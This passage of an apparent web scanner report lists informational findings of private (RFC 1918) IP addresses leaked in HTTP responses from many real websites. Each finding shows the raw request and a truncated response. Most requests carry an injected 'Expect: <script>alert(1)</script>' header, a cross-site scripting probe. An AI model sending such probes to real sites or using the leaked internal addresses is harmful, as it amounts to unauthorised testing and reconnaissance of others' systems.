X-FB-Server: 10.54.201.47
X-Cnection: close
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Length: 6467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.30. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=295&colorscheme=light&connections=15&stream=false&header=true&height=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.177.59
X-Cnection: close
Date: Wed, 04 May 2011 00:53:34 GMT
Content-Length: 14499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.31. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=295&colorscheme=light&connections=15&stream=false&header=true&height=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/products
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.35
X-Cnection: close
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Length: 14513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.32. http://www.faithhighway.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.faithhighway.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.faithhighway.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:08:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Location: http://www.faithhighway.com/
Vary: Accept-Encoding
v1e-host: www.faithhighway.com
v1e-srvaddr: 10.0.2.11
Content-Length: 1


26.33. http://www.ferrellgas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ferrellgas.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ferrellgas.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=UPKKWVS172.30.5.25CKKYJ; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:05:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

26.34. http://www.gemvara.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemvara.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gemvara.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=YKMIMIS192.168.100.34CKOKJ; path=/
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Expires: Mon, 02 May 2016 06:37:28 GMT
Last-Modified: Fri, 29 Apr 2011 20:29:00 GMT
Cache-Control: max-age=157700000;public;
Etag: W/"1150-1304108940000"
Accept-Ranges: bytes
Content-Language: en-US
Content-Length: 1150
Date: Wed, 04 May 2011 01:04:07 GMT

............ .h.......(....... ..... ........................................................................................................................~......p....~..............................
...[SNIP]...

26.35. http://www.gmaccessorieszone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gmaccessorieszone.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gmaccessorieszone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=VIMLQLS192.168.1.65CKMMY; path=/
Date: Wed, 04 May 2011 03:19:42 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 480
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

26.36. http://www.inautix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inautix.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inautix.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Pershing LLC
Date: Wed, 04 May 2011 01:39:23 GMT
Set-Cookie: JSESSIONID=3D76E0F5DA1F23D742B618B8DC0EF710; Path=/cps
Set-Cookie: RedDotLiveServerSessionID_inautix=SID-7997F859-ED5AF4F9; Path=/
MASTERWEBLET: CACHED
Expires: Wed, 04 May 2011 01:36:00 GMT
Date: Wed, 04 May 2011 01:36:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 13484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 1952 - published by Open Text Web Solutions 10 - 10.0.1.51 - 23337 -->
...[SNIP]...

26.37. http://www.installadmin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.installadmin.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.installadmin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1020425519
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:28:28 GMT
Via: 1.1 varnish 172.16.10.207
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.38. http://www.jacksonhewitt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jacksonhewitt.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jacksonhewitt.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: JH227=VLKUKIS172.16.128.61CKMWO; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:35:22 GMT


26.39. http://www.jeuxvideo.fr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jeuxvideo.fr
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jeuxvideo.fr
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 1233
Date: Wed, 04 May 2011 04:01:10 GMT
Age: 0
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src=http://error.m6web.fr/pix.jpg?varnish=172.16.1.28&backend=(null)&status=417>
...[SNIP]...

26.40. http://www.kidsreads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kidsreads.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kidsreads.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 686387156
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:06:07 GMT
Via: 1.1 varnish 172.17.34.80
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.41. http://www.lookupemailaddresses.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lookupemailaddresses.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lookupemailaddresses.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2238980375
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:06:34 GMT
Via: 1.1 varnish 172.17.2.192
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.42. http://www.malemodel.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.malemodel.us
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.malemodel.us
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2312575010
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 04:01:39 GMT
Via: 1.1 varnish 172.17.66.60
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.43. http://www.medicalcodingdegrees.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medicalcodingdegrees.net
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicalcodingdegrees.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2254163554
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:29:04 GMT
Via: 1.1 varnish 172.17.34.103
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.44. http://www.metabolismcalculator.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metabolismcalculator.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metabolismcalculator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1472095108
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:17:04 GMT
Via: 1.1 varnish 172.17.66.87
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.45. http://www.michigan-hotels.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michigan-hotels.org
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.michigan-hotels.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 750702323
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:00:07 GMT
Via: 1.1 varnish 172.17.2.194
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.46. http://www.millionairesociety.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millionairesociety.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.millionairesociety.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1679203706
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:00:41 GMT
Via: 1.1 varnish 172.17.3.208
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.47. http://www.mizunousa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mizunousa.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mizunousa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=ZJVLOYS192.168.100.184CKOLL; path=/
Date: Wed, 04 May 2011 02:00:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 472
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

26.48. http://www.mochimedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mochimedia.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mochimedia.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Wed, 04 May 2011 00:59:50 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Thu, 21 Oct 2010 04:46:54 GMT
Connection: keep-alive
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.28:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40057
X-Mochi-Source: 10.0.0.239:19245

............ .h.......(....... ..... ........................................................................................................gaaa.RRR.SSS.UUU.SSS.RRR.SSS.jjj....W....................ll
...[SNIP]...

26.49. http://www.ocfl.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ocfl.net
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ocfl.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=PKKPKPS192.168.255.102CKOWK; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:57 GMT


26.50. http://www.opt-intelligence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opt-intelligence.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opt-intelligence.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=MLVJMZS192.168.1.209CKMYW; path=/
Date: Wed, 04 May 2011 02:55:27 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 480
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

26.51. http://www.pizzainn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pizzainn.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pizzainn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2016440326
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:17:21 GMT
Via: 1.1 varnish 172.16.11.84
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.52. http://www.rollingout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rollingout.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rollingout.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 294990963
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:21:35 GMT
Via: 1.1 varnish 172.17.3.158
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.53. http://www.thefreemanonline.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreemanonline.org
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefreemanonline.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 444605281
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 04:18:13 GMT
Via: 1.1 varnish 172.17.66.86
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.54. http://www.undercoverlawyer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.undercoverlawyer.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.undercoverlawyer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1144766662
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:25:59 GMT
Via: 1.1 varnish 172.17.3.23
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.55. http://www.uneasysilence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uneasysilence.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uneasysilence.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1493777443
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:06:31 GMT
Via: 1.1 varnish 172.16.10.14
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.56. http://www.uniwatchblog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uniwatchblog.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uniwatchblog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 647165449
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:17:37 GMT
Via: 1.1 varnish 172.16.11.7
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
